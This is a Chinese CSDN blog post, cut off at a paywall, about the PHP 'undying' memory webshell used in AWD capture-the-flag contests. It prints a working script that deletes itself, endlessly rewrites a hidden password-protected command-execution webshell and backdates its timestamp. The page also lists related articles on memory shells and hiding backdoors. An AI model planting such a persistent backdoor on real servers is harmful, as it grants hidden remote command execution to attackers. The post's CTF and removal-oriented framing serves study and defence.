PHP内存型木马

最新推荐文章于 2024-08-07 04:07:53 发布
最新推荐文章于 2024-08-07 04:07:53 发布
阅读量7.9k 收藏 25
点赞数 5
分类专栏: Web安全 文章标签: PHP内存性木马 PHP不死马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SKI_12/article/details/84920127
版权
本文介绍了PHP内存性木马,也称为PHP不死马,详细阐述了其工作原理,包括ignore_user_abort()和set_time_limit()函数的使用,以及如何通过unlink()函数删除自身以隐藏踪迹。同时,文章提供了查杀这种木马的方法,包括重启服务、杀死www-data用户进程、创建同名目录以及编写竞争脚本等策略。
摘要由CSDN通过智能技术生成

基本概念

PHP内存性木马即PHP不死马,一般会删除自身以进程的形式循环创建隐蔽的后门。

通常在AWD Web题中用得较多。

Demo及原理

nodie.php

<?php
	ignore_user_abort(true);
	set_time_limit(0);
	unlink(__FILE__);
	$file = '/var/www/dvwa/.ski12.php';
	$code = '<?php if(md5($_POST["pass"])=="cdd7b7420654eb16c1e1b748d5b7c5b8"){@system($_POST[a]);}?>';
	while (1) {
		file_put_contents($file, $code);
		system('touch -m -d "2018-12-01 09:10:12" .ski12.php');
		usleep(5000);
	}
?>

简单分析:

ignore_user_abort()函数设置与客户机断开是否会终止脚本的执行。这里设置为true则忽略与用户的断开,即使与客户机断开脚本仍会执行。

set_time_limit()函数设置脚本最大执行时间。这里设置为0,

最低0.47元/天 解锁文章
Mi1k7ea
关注
  • 5
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
linux系统内存执行elf的多种方式(内存马)
墨痕诉清风的博客
08-13 3095
一、前言 无文件(fileless)恶意软件攻击现在已经越来越流行,这一点并不奇怪,因为这种技术通常不会留下蛛丝马迹。本文的重点不是介绍如何在Windows RAM中执行程序,我们的目标是GNU/Linux。Linux是服务器行业的领头羊,在上百万嵌入式设备和大多数web服务上都能看到Linux的身影。在本文中,我们将简单探讨如何在Linux系统内存中执行程序,也讨论了如何应付具有挑战的环境。......
不死马php如何取证_php不死马如何删除
weixin_39669075的博客
12-21 423
什么是不死马内存马,通俗讲就是不死马,就是会运行一段永远不退出的程序常驻在PHP进程里,无限执行。生成过程 (推荐学习:PHP视频教程)不死马.php → 上传到server → server执行文件 → server本地无限循环生成 (一句话.php)网上流传的不死马...
关于Java/Python/PHP 内存
2301_80115097的博客
11-15 760
因为内存马种类繁杂,每次都要翻看很多文章,又加上最近有某个大活动,因此就写了这篇文章来总结一下常见的3种语言(PHP、Python、JAVA)的内存马的注入方法和查杀方法,并尝试自己完成一个内存马查杀工具的实现。希望本篇文章能给师傅们带来一些启发。文章一长就难免在表达和准确上有所疏漏,如有错误或不足,请师傅们指正。
内存马检测排查手段_内存马查杀
2401_84215240的博客
07-22 1584
内存马是无文件落地webshell中最常见的攻击手段,随着攻防演练对抗强度越来越高,流量分析、EDR等专业安全设备被蓝方广泛使用,传统的文件上传的webshll以及文件形式的后门容易被检测到,文件shell明显气数已尽,而内存马因其隐蔽等优点从而越来越盛行。
哥斯拉PHP马分析
zeros__的博客
12-22 4937
前言: 因为工作而分析主机侧安全产品的告警时,除了种类繁多的误报,见到的最多的就是冰蝎和哥斯拉。判断冰蝎一般通过到"AES"几个字母后,看上下文是不是类似: "file_get_contents("XXX"), "AES", $_SESSION['k']"。 但是判断是不是哥斯拉, ...
<?php+echo+木马,Ha0k 0.3 PHP 网页木马修改版
weixin_39541681的博客
03-19 143
//此处可设置多个用户$passwd = array('ha0k' => 'ha0k','hackerdsb'=>'hackerdsb');/* 此处设置命令的别名 */$aliases = array('ls' => 'ipconfig','ll' => 'ls -lvhF');if (!isset($_SERVER['PHP_AUTH_USER'])||!isset($...
Php内存马,php中的内存管理的介绍
weixin_36400833的博客
03-19 197
本篇文章给大家带来的内容是关于php中的内存管理的介绍,有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助。一、php内存管理概述——Zend引擎由于计算机的内存由操作系统进行管理,所以普通应用程序是无法直接对内存进行访问的。应用程序只能向操作系统申请内存,通常的应用也是这么做的,在需要的时候通过类似malloc之类的库函数 向操作系统申请内存。在一些对能要求较高的应用场景下是需要频繁...
内存马介绍及分析-带查杀工具tomcat memshell scanner.jsp
weixin_65629944的博客
12-18 1007
先判断是通过什么方法注入的内存马,可以先查看web日志是否有可疑的web访问日志,如果是filter或者listener类就会有大量url请求路径相同参数不同的,或者页面不存在但是返回200的,查看是否有类似哥斯拉、冰蝎相同的url请求,哥斯拉和冰蝎的内存马注入流量特征与普通webshell的流量特征基本吻合。4.java VisualVM工具:是一款免费的,集成了多个 JDK 命令行工具的可视化工具,它能为您提供强大的分析能力,对 Java 应用程序做能分析和调优。cmd=后跟命令即可。
木马免杀基础学习
fa1lr4in的小博客
07-13 894
参考书籍:《木马攻防全攻略》 --万立夫编著 --电脑报电子音像出版社 参考链接:https://www.52pojie.cn/thread-32064-1-1.html 推荐的免杀思路链接:http://www.cnhonkerarmy.com/thread-187791-1-1.html http://www.cnhonkerarmy.com/forum.php?fromuid=...
利用Think远程代码执行漏洞进行脱库上传免杀木马情报
免费网络加-速-器游戏加/速/器
06-01 5978
1 详细说明 近日我捕获到一个利用Think远程代码执行漏洞进行脱库上传免杀木马的最新样本。样本文件名为http://acedgwf.cn/01/js.css(伪装加密后的php文件),直接打开后展示“js.css”(php语言加密代码)。如下图所示: Think远程代码执行漏洞 2 情报来源 经由地址http://acedgwf.cn/01/js.css捕获远控木马样本 3 样本分析 我将从以下三个步骤来进行情报提交:捕获样本情报→ 分析解密后门文件代码→分析域名资产和漏洞影响;...
awd网络攻防赛常用的不死马,超强
10-30
以上是不死马的代码,pass=R_Hacker. 采用了md5加密。
内存Webshell马详解
悦分享
11-08 4634
内存webshell相比于常规webshell更容易躲避传统安全监测设备的检测,通常被用来做持久化,规避检测,持续驻留目标服务器。无文件攻击、内存Webshell、进程注入等基于内存的攻击手段也受到了大多数攻击者青睐。内存马是无文件攻击的一种常用手段,随着攻防演练热度越来越高:攻防双方的博弈,流量分析、EDR等专业安全设备被蓝方广泛使用,传统的文件上传的webshll或以文件形式驻留的后门越来越容易被检测到。因此内存马近年来越来越被重视,逐渐成为了攻击方的“必备武器”,针对内存马的防护也越来越被重视。
不死马的利用与克制(基于条件竞争)及变种不死马
Welcome To Myon'Blog !
10-06 3218
不死马内存马,它会写进进程里,并且无限地在指定目录中生成木马文件这里以PHP不死马为例上面代码即为最简单的不死马,其目的是创建一个名为".test.php"的PHP文件,该文件包含一个带有密码验证的后门,允许执行任意PHP代码。关于代码的详细解释:设置PHP脚本忽略用户中止连接,即使用户在浏览器中停止加载页面,脚本仍然会继续执行。设置脚本执行时间限制为0,意味着脚本可以无限期地运行,不会被PHP的执行时间限制所中断。
应急--内存马查杀演示(极简)
m0_58355451的博客
08-30 2805
由客户端发起的Web请求后,中间件的各个独立的组件如Listener、Filter、Servlet等组件会在请求过程中做监听、判断、过滤等操作,内存马就是利用请求过程在内存中修改已有的组件或动态注册一个新的组件,插入恶意的shellcode,达到持久化控制服务器的目的。以java为例,客户端发起的web请求会依次经过Listener、Filter、Servlet三个组件,我们只要在这个请求的过程中做手脚,在内存中修改已有的组件或者动态注册一个新的组件,插入恶意的shellcode,就可以达到我们的目的。
内存
最新发布
weixin_41335734的博客
08-07 33
内存马是一种恶意软件,它利用计算机系统中的内存漏洞,将恶意代码注入到目标机器的内存中,并利用该代码执行各种攻击操作。以下是关于内存马的详细解析:一、定义与特点定义:内存马是一种只在内存中运行,没有文件落地或者运行后能够删除自身的木马。它利用内存中的漏洞和机制,隐藏自己并执行恶意操作。特点:无文件落地:内存马不会在磁盘上留下...
技术分享 上线利器 - ShellHub 插件初体验_echo md5(42291) unlink(_file_)
2301_76224593的博客
04-29 212
渗透测试过程中发现存在文件上传漏洞时,我们往往会尝试通过上传木马文件获取一个 webshell。上传的木马文件通常需要一个客户端例如冰蝎和蚁剑进行 shell 的获取及管理,在这一过程中用户需要打开管理工具并填写连接信息如上传文件的 url、连接密码等。然而,Goby 中 ShellHub 的出现可以使这个过程一键优雅的实现,只需点击 webshell 键即可弹出 webshell 控制窗口。
php@unlink删除文件失败原因
夏尔的小酒馆
12-17 8406
最近做我网站的更换头像功能时,涉及到了PHP的文件上传。 我采用的方案是用户先上传到服务器,服务器再上传到阿里云的OSS,中间会有一个把图片临时存储到服务器的过程。于是在使用php的@unlink(删除指定文件)方法时发现了删除失败的问题。 开始以为是我的路径名写错了,后来确认这个参数没有错。删除失败的原因是图片仍然被进程占用,所以想要成功执行@unlink操作,我们最好手动释放下文件对象,避免因...
php后门文件处理方式_PHP后门隐藏的一些技巧总结
weixin_33760049的博客
03-09 903
前言如果想让自己的Webshell留的更久一些,除了Webshell要免杀,还需要注意一些隐藏技巧,比如隐藏文件,修改时间属,隐藏文件内容等。1、隐藏文件使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属、存档文件属、只读文件属和隐藏文件属。attrib +s +a +h +r shell.php //隐藏shell.php文件2、修改文件时间属当你试图在一...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值